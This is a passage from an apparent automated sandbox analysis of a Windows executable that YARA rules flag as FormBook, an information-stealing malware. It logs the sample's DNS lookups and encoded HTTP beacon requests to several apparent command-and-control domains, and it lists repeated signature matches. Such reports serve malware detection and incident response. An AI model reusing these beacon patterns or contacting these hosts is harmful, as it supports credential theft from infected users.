00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.govindfinance.com
 Source: global traffic HTTP traffic detected: GET /fqiq/?M8sli0XH=Sq1XZHSp0Fahcv5+gSE8w/MNMhRnHgbusC6/nQsgBpT+5tokIrb/ucxwlvTI4NNTcxne7QOgew==&eL3dh=5jNDd4kX HTTP/1.1Host: www.satellitephonstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7VG/dsSCitRF0szg== HTTP/1.1Host: www.seal-brother.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /fqiq/?M8sli0XH=WJEXqHgQjytEiPF7j6bk2V/X0M1eNxv0v3X6q4y0idXjxAWnze1B3elnUPttxbcH5sirVrhN7g==&eL3dh=5jNDd4kX HTTP/1.1Host: www.driventow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg== HTTP/1.1Host: www.kangrungao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX HTTP/1.1Host: www.healthyweekendtips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw== HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY

### System Summary:

 Malicious sample detected (through community Yara rule) Show sources
 Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Uses 32bit PE files Show sources
 Source: 2u2u8wnrrW.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
 Yara signature match Show sources